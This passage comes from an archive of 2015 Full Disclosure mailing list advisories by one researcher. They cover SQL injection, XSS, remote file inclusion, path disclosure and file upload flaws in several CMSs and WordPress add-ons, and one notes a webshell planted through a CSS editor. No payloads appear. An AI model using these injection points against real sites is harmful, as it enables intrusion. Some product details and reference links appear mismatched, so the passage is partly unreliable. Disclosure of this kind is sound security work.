http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-information-leakage-security-vulnerabilities/

https://infoswift.wordpress.com/2015/03/14/724cms-5-01-information-leakage-security-vulnerabilities/

http://marc.info/?l=full-disclosurem=142576280203098w=4

http://en.hackdig.com/wap/?id=17055






--

Wang Jing,

Division of Mathematical Sciences (MAS),

School of Physical and Mathematical Sciences (SPMS),

Nanyang Technological University (NTU),

Singapore.

http://www.tetraph.com/wangjing/

https://twitter.com/tetraphibious

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] 724CMS 5.01 Multiple SQL Injection Security Vulnerabilities

2015-03-16 Thread Jing Wang
*724CMS 5.01 Multiple SQL Injection Security Vulnerabilities*


Exploit Title: 724CMS Multiple SQL Injection Security Vulnerabilities
Vendor: 724CMS
Product: 724CMS
Vulnerable Versions: 3.01   4.01   4.59   5.01
Tested Version: 5.01
Advisory Publication: March 14, 2015
Latest Update: March 14, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Recommendation Details:*


*(1) Vendor  Product Description:*


*Vendor:*
724CMS Enterprise



*Product  Vulnerable Versions:*
724CMS
3.01
4.01
4.59
5.01





*Vendor URL  download:*
724CMS can be gain from here,
http://724cms.com/



*Product Introduction Overview:*
724CMS is a content management system (CMS) that has customers spread in
Canada, Japan, Korean, the United States, European and many others. It
allows publishing, editing and modifying content, organizing, deleting as
well as maintenance from a central interface. Meanwhile, 724CMS provides
procedures to manage workflow in a collaborative environment.

A CMS helps you create and store content in a shared repository. It then
manages the relationships between content items for you (e.g. keeping track
of where they fit into the site hierarchy). Finally, it ensures that each
content item is connected to the right style sheet when it comes to be
published. Some CMSs also provide facilities to track the status of content
items through editorial processes and workflows.






*(2) Vulnerability Details:*
724CMS web application has a security bug problem. It can be exploited by
SQL Injection attacks. This may allow an attacker to inject or manipulate
SQL queries in the back-end database, allowing for the manipulation or
disclosure of arbitrary data.

Several 724CMS products vulnerabilities have been found by some other bug
hunter researchers before. 724CMS has patched some of them. The MITRE
Corporation is a not-for-profit company that operates multiple federally
funded research and development centers (FFRDCs), which provide innovative,
practical solutions for some of our nation's most critical challenges in
defense and intelligence, aviation, civil systems, homeland security, the
judiciary, healthcare, and cybersecurity. It has phase, votes, comments and
proposed details related to 724CMS vulnerabilities.


*(2.1)* The first cipher programming flaw  occurs at /index.php page with
Lang, ID parameters.

*(2.2) *The second cipher programming flaw occurs at /section.php page
with Lang, ID parameters.








*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/724cms-501-multiple-sql-injection.html
http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01766.html
http://marc.info/?a=139222176300014r=1w=4
http://en.1337day.com/exploit/23308






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] WordPress Daily Edition Theme v1.6.2 Information Leakage Security Vulnerabilities

2015-03-10 Thread Jing Wang
*WordPress Daily Edition Theme v1.6.2 Information Leakage Security
Vulnerabilities*


Exploit Title: WordPress Daily Edition Theme /thumb.php src Parameters
Information Leakage Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.*   v1.5.*   v1.4.*   v1.3.*   v1.2.*   v1.1.*
v.1.0.*
Tested Version: v1.6.2
Advisory Publication: March 10, 2015
Latest Update: March 10, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor  Product Description:*


*Vendor:*
WooThemes



*Product  Vulnerable Versions:*
WordPress Daily Edition Theme
version 1.6.7
version 1.6.6
version 1.6.5
version 1.6.4
version 1.6.3
version 1.6.2
version 1.6.1
version 1.6
version 1.5
version 1.4.11
version 1.4.10
version 1.4.9
version 1.4.8
version 1.4.7
version 1.4.6
version 1.4.5
version 1.4.4
version 1.4.3
version 1.4.2
version 1.4.1
version 1.4.0
version 1.3.2
version 1.3.1
version 1.3
version 1.2.1
version 1.2
version 1.1.2
version 1.1.1
version 1.1
version 1.0.12
version 1.0.11
version 1.0.10
version 1.0.9
version 1.0.8
version 1.0.7
version 1.0.6
version 1.0.5
version 1.0.4
version 1.0.3
version 1.0.2
version 1.0.1
version 1.0



*Vendor URL  buy:*
WordPress Daily Edition Theme can be got from here,
http://www.woothemes.com/products/daily-edition/
http://dzv365zjfbd8v.cloudfront.net/changelogs/dailyedition/changelog.txt



*Product Introduction:*
Daily Edition WordPress Theme developed by wootheme team and Daily Edition
is a clean, spacious newspaper/magazine theme designed by Liam McKay. With
loads of home page modules to enable/disable and a unique java script-based
featured scroller and video player the theme oozes sophistication

The Daily Edition theme offers users many options, controlled from the
widgets area and the theme options page – it makes both the themes
appearance and functions flexible. From The Daily Edition 3 option pages
you can for example add your Twitter and Google analytics code, some custom
CSS and footer content – and in the widgets area you find a practical ads
management.

Unique Features
These are some of the more unique features that you will find within the
theme:
A neat javascript home page featured slider, with thumbnail previews of
previous/next slides on hover over the dots.
A “talking points” home page that can display posts according to tags,
in order of most commented to least commented. A great way to highlight
posts gathering dust in the archives.
A customizable home page layout with options to specify how many full
width blog posts and how many “box” posts you would like to display.
A javascript home page video player with thumbnail hover effect.
16 delicious colour schemes to choose from!







*(2) Vulnerability Details:*
WordPress Daily Edition Theme has a web application security bug problem.
It can be exploited by information leakage attacks - Full Path Disclosure
(FPD). This may allow a remote attacker to disclose the software's
installation path. While such information is relatively low risk, it is
often useful in carrying out additional, more focused attacks.


*(2.1) *The code flaw occurs at thumb.php? page with src parameters.







*References:*
http://tetraph.com/security/information-leakage-vulnerability/wordpress-daily-edition-theme-v1-6-2-information-leakage-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162_10.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-information-leakage-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-information-leakage-security-vulnerabilities/
https://webtechwire.wordpress.com/2015/03/10/wordpress-daily-edition-theme-v1-6-2-information-leakage-security-vulnerabilities/
http://static-173-79-223-25.washdc.fios.verizon.net/?a=139222176300014r=1w=2
https://cxsecurity.com/issue/WLB-2015020093






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Webshop hun v1.062S Information Leakage (Full Path Disclosure - FPD) Security Vulnerabilities

2015-03-07 Thread Jing Wang
*Webshop hun v1.062S Information Leakage (Full Path Disclosure - FPD)
Security Vulnerabilities*


Exploit Title: Webshop hun v1.062S /index.php termid parameter Information
Leakage Security Vulnerabilities
Product: Webshop hun
Vendor: Webshop hun
Vulnerable Versions: v1.062S
Tested Version: v1.062S
Advisory Publication: March 07, 2015
Latest Update: March 07, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor  Product Description:*


*Vendor:*
Webshop hun


*Product  Version:*
Webshop hun
v1.062S


*Vendor URL  Download:*
Webshop hun can be bought from here,
http://www.webshophun.hu/index


*Product Introduction:*
Webshop hun is an online product sell web application system.

If our webshop you want to distribute your products, but it is too
expensive to find on the internet found solutions, select the Webshop Hun
shop program and get web store for free and total maker banner must display
at the bottom of the page 468x60 size. The download shop program, there is
no product piece limit nor any quantitative restrictions, can be used
immediately after installation video which we provide assistance.

The Hun Shop store for a free for all. In our experience, the most dynamic
web solutions ranging from our country. If the Webshop Hun own image does
not suit you, you can also customize the look of some of the images and the
corresponding text replacement, or an extra charge we can realize your
ideas. The Webshop Hun pages search engine optimized. They made the Hun
Shop web program to meet efficiency guidelines for the search engines. The
pages are easy to read and contain no unnecessary HTML tags. Any web page
is simply a few clicks away.





*(2) Vulnerability Details:*
Webshop hun web application has a security bug problem. It can be exploited
by Information Leakage attacks. This may allow a remote attacker to
disclose the software's installation path. While such information is
relatively low risk, it is often useful in carrying out additional, more
focused attacks.



*(2.1)* The code flaw occurs at index.php? page with termid parameter.
Attackers can get information such the server software installation path,
etc.






*References:*
http://tetraph.com/security/information-leakage-vulnerability/webshop-hun-v1-062s-information-leakage-full-path-disclosure-fpd-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/webshop-hun-v1062s-information-leakage.html
http://www.inzeed.com/kaleidoscope/computer-web-security/webshop-hun-v1-062s-information-leakage-full-path-disclosure-fpd-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/webshop-hun-v1-062s-information-leakage-full-path-disclosure-fpd-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/webshop-hun-v1-062s-information-leakage-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/26
http://packetstormsecurity.com/files/130648/Webshop-Hun-1.062S-Cross-Site-Scripting.html







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] WordPress Daily Edition Theme v1.6.2 Unrestricted Upload of File Security Vulnerabilities

2015-03-07 Thread Jing Wang
*WordPress Daily Edition Theme v1.6.2 Unrestricted Upload of File Security
Vulnerabilities*


Exploit Title: WordPress Daily Edition Theme v1.6.2 /thumb.php src
Parameter Unrestricted Upload of File Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.2
Tested Version: v1.6.2
Advisory Publication: Mar 07, 2015
Latest Update: Mar 07, 2015
Vulnerability Type: Unrestricted Upload of File with Dangerous Type
[CWE-434]
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor  Product Description:*


*Vendor:*
WooThemes



*Product  Version:*
WordPress Daily Edition Theme
v1.6.2



*Vendor URL  Download:*
WordPress Daily Edition Theme can be got from here,
http://www.woothemes.com/products/daily-edition/



*Product Introduction:*
Daily Edition WordPress Theme developed by wootheme team and Daily Edition
is a clean, spacious newspaper/magazine theme designed by Liam McKay. With
loads of home page modules to enable/disable and a unique java script-based
featured scroller and video player the theme oozes sophistication

The Daily Edition theme offers users many options, controlled from the
widgets area and the theme options page – it makes both the themes
appearance and functions flexible. From The Daily Edition 3 option pages
you can for example add your Twitter and Google analytics code, some custom
CSS and footer content – and in the widgets area you find a practical ads
management.

Unique Features
These are some of the more unique features that you will find within the
theme:
A neat javascript home page featured slider, with thumbnail previews of
previous/next slides on hover over the dots.
A “talking points” home page that can display posts according to tags,
in order of most commented to least commented. A great way to highlight
posts gathering dust in the archives.
A customizable home page layout with options to specify how many full
width blog posts and how many “box” posts you would like to display.
A javascript home page video player with thumbnail hover effect.
16 delicious colour schemes to choose from!







*(2) Vulnerability Details:*
WordPress Daily Edition Theme web application has a security bug problem.
It can be exploited by Unrestricted Upload of File (Arbitrary File
Uploading) attacks. With a specially crafted request, a remote attacker can
include arbitrary files from the targeted host or from a remote or local
host . This may allow disclosing file contents or executing files like PHP
scripts. Such attacks are limited due to the script only calling files
already on the target host.


*(2.1)* The code flaw occurs at thumb.php? page with src parameters.








*References:*
http://tetraph.com/security/unrestricted-upload-of-file-arbitrary/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/4
http://packetstormsecurity.com/files/130653/Webshop-Hun-1.062S-Directory-Traversal.html







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] WordPress Daily Edition Theme v1.6.2 SQL Injection Security Vulnerabilities

2015-03-07 Thread Jing Wang
*WordPress Daily Edition Theme v1.6.2 SQL Injection Security
Vulnerabilities*


Exploit Title: WordPress Daily Edition Theme v1.6.2 /fiche-disque.php id
Parameters SQL Injection Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.2
Tested Version: v1.6.2
Advisory Publication: Mar 07, 2015
Latest Update: Mar 07, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor  Product Description:*



*Vendor:*
WooThemes



*Product  Version:*
WordPress Daily Edition Theme
v1.6.2



*Vendor URL  Download:*
WordPress Daily Edition Theme can be got from here,
http://www.woothemes.com/products/daily-edition/



*Product Introduction:*
Daily Edition WordPress Theme developed by wootheme team and Daily Edition
is a clean, spacious newspaper/magazine theme designed by Liam McKay. With
loads of home page modules to enable/disable and a unique java script-based
featured scroller and video player the theme oozes sophistication

The Daily Edition theme offers users many options, controlled from the
widgets area and the theme options page – it makes both the themes
appearance and functions flexible. From The Daily Edition 3 option pages
you can for example add your Twitter and Google analytics code, some custom
CSS and footer content – and in the widgets area you find a practical ads
management.

Unique Features
These are some of the more unique features that you will find within the
theme:
A neat javascript home page featured slider, with thumbnail previews of
previous/next slides on hover over the dots.
A “talking points” home page that can display posts according to tags,
in order of most commented to least commented. A great way to highlight
posts gathering dust in the archives.
A customizable home page layout with options to specify how many full
width blog posts and how many “box” posts you would like to display.
A javascript home page video player with thumbnail hover effect.
16 delicious colour schemes to choose from!







*(2) Vulnerability Details:*
WordPress Daily Edition Theme web application has a  security bug problem.
It can be exploited by SQL Injection attacks. This may allow a remote
attacker to inject or manipulate SQL queries in the back-end database,
allowing for the manipulation or disclosure of arbitrary data.


*(2.1)* The code flaw occurs at fiche-disque.php? page with id
parameter.








*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162-sql.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/27
http://packetstormsecurity.com/files/130075/SmartCMS-2-SQL-Injection.html






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] Webshop hun v1.062S XSS (Cross-site Scripting) Security Vulnerabilities

2015-03-04 Thread Jing Wang
*Webshop hun v1.062S XSS (Cross-site Scripting) Security Vulnerabilities*


Exploit Title: Webshop hun v1.062S /index.php Multiple Parameters XSS
Security Vulnerabilities
Product: Webshop hun
Vendor: Webshop hun
Vulnerable Versions: v1.062S
Tested Version: v1.062S
Advisory Publication: Mar 04, 2015
Latest Update: Mar 04, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor  Product Description:*


*Vendor:*
Webshop hun


*Product  Version:*
Webshop hun
v1.062S


*Vendor URL  Download:*
Webshop hun can be downloaded from here,
http://www.webshophun.hu/index


*Product Introduction:*
Webshop hun is an online product sell web application system.

If our webshop you want to distribute your products, but it is too
expensive to find on the internet found solutions, select the Webshop Hun
shop program and get web store for free and total maker banner must display
at the bottom of the page 468x60 size. The download shop program, there is
no product piece limit nor any quantitative restrictions, can be used
immediately after installation video which we provide assistance.

The Hun Shop store for a free for all. In our experience, the most dynamic
web solutions ranging from our country. If the Webshop Hun own image does
not suit you, you can also customize the look of some of the images and the
corresponding text replacement, or an extra charge we can realize your
ideas. The Webshop Hun pages search engine optimized. They made the Hun
Shop web program to meet efficiency guidelines for the search engines. The
pages are easy to read and contain no unnecessary HTML tags. Any web page
is simply a few clicks away.





*(2) Vulnerability Details:*
Webshop hun has a web application security bug problem. It can be exploited
by XSS (Cross-site Scripting) attacks.


*(2.1) *The vulnerability occurs at index.php? page with param center
lap termid nyelv_id parameters.






*References:*
http://tetraph.com/security/xss-vulnerability/webshop-hun-v1-062s-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/webshop-hun-v1062s-xss-cross-site.html
http://www.inzeed.com/kaleidoscope/computer-web-security/webshop-hun-v1-062s-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/webshop-hun-v1-062s-xss-cross-site-scripting-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/03/04/webshop-hun-v1-062s-xss-cross-site-scripting-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014r=1w=2





--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] WordPress Max Banner Ads Plug-in XSS (Cross-site Scripting) Security Vulnerabilities

2015-03-04 Thread Jing Wang
*WordPress Max Banner Ads Plug-in XSS (Cross-site Scripting) Security
Vulnerabilities*


Exploit Title: Wordpress Max Banner Ads Plugin /info.php zone_id
Parameter XSS Security Vulnerabilities
Product: Wordpress Max Banner Ads Plugin
Vendor: MaxBlogPress
Vulnerable Versions: 1.9  1.8   1.4   1.3.*   1.2.*   1.1   1.09
Tested Version: Check All Related Versions' Source Code
Advisory Publication: Mar 04, 2015
Latest Update: Mar 04, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor  Product Description:*


*Vendor:*
MaxBlogPress


*Product  Version:*
Wordpress Max Banner Ads Plugin
1.9   1.8   1.4   1.3.7   1.3.6   1.3.5   1.3.4   1.3.3   1.3.2   1.3.1
1.3
1.2.7   1.2.6   1.2.5   1.2   1.1   1.09



*Vendor URL  Download:*
Wordpress Max Banner Ads Plugin can be downloaded from here,
http://www.maxblogpress.com/plugins/


*Product Introduction:*
Easily add and rotate banners in your wordpress blog anywhere you like
without editing any themes or touching any codes





*(2) Vulnerability Details:*
Wordpress Max Banner Ads Plugin has a web application security bug
problem. It can be exploited by XSS (Cross-site Scripting) attacks.


*(2.1) *The vulnerability occurs at info.php? page with zone_id
parameter.







*References:*
http://tetraph.com/security/xss-vulnerability/wordpress-max-banner-ads-plug-in-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-max-banner-ads-plug-in-xss.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-max-banner-ads-plug-in-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-max-banner-ads-plug-in-xss-cross-site-scripting-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/03/04/wordpress-max-banner-ads-plug-in-xss-cross-site-scripting-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014r=1w=2







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] NetCat CMS Multiple Remote File Inclusion (RFI) Security Vulnerabilities

2015-03-01 Thread Jing Wang
*NetCat CMS Multiple Remote File Inclusion (RFI) Security Vulnerabilities*


Exploit Title: NetCat CMS Multiple Remote File Inclusion (RFI) Security
Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: Improper Control of Filename for Include/Require
Statement in PHP Program ('PHP Remote File Inclusion') [CWE-98]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor  Product Description:*


*Vendor:*
NetCat


*Product  Version:*
NetCat
3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL  Download:*
NetCat can be downloaded from here,
http://netcat.ru/


*Product Introduction:*
NetCat.ru is russian local company. NetCat designed to create an absolute
majority of the types of sites: from simple business card with a minimum
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects completely
different directions and at any level of complexity. View examples of sites
running on NetCat CMS can be in a special section.

Manage the site on the basis of NetCat can even inexperienced user,
because it does not require knowledge of Internet technologies, programming
and markup languages. NetCat constantly improving, adds new features. In
the process of finalizing necessarily take into account the wishes of our
partners and clients, as well as trends in Internet development. More than
2,000 studios and private web developers have chosen for their projects is
NetCat, and in 2013 sites, successfully working on our CMS, created more
than 18,000.





*(2) Vulnerability Details:*
NetCat has a security bug problem. It can be exploited by Remote File
Inclusion (RFI) attacks.

*(2.1)* The first vulnerability occurs at /eshop/index.php? page with
INCLUDE_FOLDER parameter.

*(2.2)* The second vulnerability occurs at add.php? page with
INCLUDE_FOLDER parameter.

*(2.3)* The third vulnerability occurs at netcat/index.php? page with
INCLUDE_FOLDER parameter.

*(2.4)* The forth vulnerability occurs at s_loadenv.inc.php? page with
INCLUDE_FOLDER parameter.

*(2.5) *The fifth vulnerability occurs at *.pdf/index.php? page with
INCLUDE_FOLDER parameter.










*References:*
http://tetraph.com/security/remote-local-file-inclusion-vulnerability/netcat-cms-multiple-remote-file-inclusion-rfi-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/netcat-cms-multiple-remote-file.html
http://www.inzeed.com/kaleidoscope/computer-security/netcat-cms-multiple-remote-file-inclusion-rfi-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-multiple-remote-file-inclusion-rfi-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/netcat-cms-multiple-remote-file-inclusion-rfi-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014r=1w=2







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Comsenz SupeSite CMS Arbitrary Code Execution Security Vulnerabilities

2015-03-01 Thread Jing Wang
*Comsenz SupeSite CMS Arbitrary Code Execution Security Vulnerabilities*



Exploit Title: Comsenz SupeSite CMS Arbitrary Code Execution Security
Vulnerabilities
Product: SupeSite CMS (Content Management System)
Vendor: Comsenz
Vulnerable Versions: 6.0.1UC   7.0
Tested Version: 7.0
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: Improper Control of Generation of Code ('Code
Injection') [CWE 94]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]






*Advisory Details:*


*(1) Vendor  Product Description:*


*Vendor:* Comsenz


*Product  Version:*
SupeSite6.0.1UC
SupeSite7.0


*Vendor URL  Download:*
SupeSite can be downloaded from here,
http://www.comsenz.com/products/other/supesite
http://www.comsenz.com/downloads/install/supesite#down_open


*Source code:*
http://www.8tiny.com/source/supesite/nav.html?index.html


*Product Introduction:*
SupeSite is an independent content management (CMS) function, and
integrates Web2.0 community personal portal system X-Space, has a strong
aggregation of community portal systems. SupeSite station can be achieved
within the forum (Discuz!), personal space (X-Space) information content
aggregation. Any webmaster , are available through SupeSite, easy to build
a community portal for Web2.0.

Features include: information management, information dissemination,
information audit, information classification, information and other custom
fields, make your site easier to manage and maintain. Information
permissions and user group permissions combine owners can publish
information, management, audit and other permissions are set to different
groups of users, so that the specified user group has information
management functions.




*(2) Vulnerability Details:*
SupeSite has a security bug problem. It can be exploited by Arbitrary Code
Execution attacks.


*(2.1)* The vulnerability occurs at normal administer CSS editor field. If
files such as a.php;a.css *.php;*.css are inserted. Normal administer
can insert a webshell to control the backstage management system.









*References:*
http://tetraph.com/security/arbitrary-code-execution-vulnerability/comsenz-supesite-cms-arbitrary-code-execution-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/comsenz-supesite-cms-arbitrary-code.html
http://www.inzeed.com/kaleidoscope/computer-security/comsenz-supesite-cms-arbitrary-code-execution-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/comsenz-supesite-cms-arbitrary-code-execution-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/comsenz-supesite-cms-arbitrary-code-execution-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014r=1w=2







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Comsenz SupeSite CMS Reflected XSS (Cross-site Scripting) Security Vulnerabilities

2015-03-01 Thread Jing Wang
*Comsenz SupeSite CMS Reflected XSS (Cross-site Scripting) Security
Vulnerabilities*



Exploit Title: Comsenz SupeSite CMS /cp.php do parameter Reflected XSS
Security Vulnerabilities
Product: SupeSite CMS (Content Management System)
Vendor: Comsenz
Vulnerable Versions: 6.0.1UC   7.0
Tested Version: 7.0
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]




*Advisory Details:*


*(1) Vendor  Product Description:*


*Vendor:* Comsenz


*Product  Version:*
SupeSite6.0.1UC
SupeSite7.0


*Vendor URL  Download:*
SupeSite can be downloaded from here,
http://www.comsenz.com/products/other/supesite
http://www.comsenz.com/downloads/install/supesite#down_open


*Source code:*
http://www.8tiny.com/source/supesite/nav.html?index.html


*Product Introduction:*
SupeSite is an independent content management (CMS) function, and
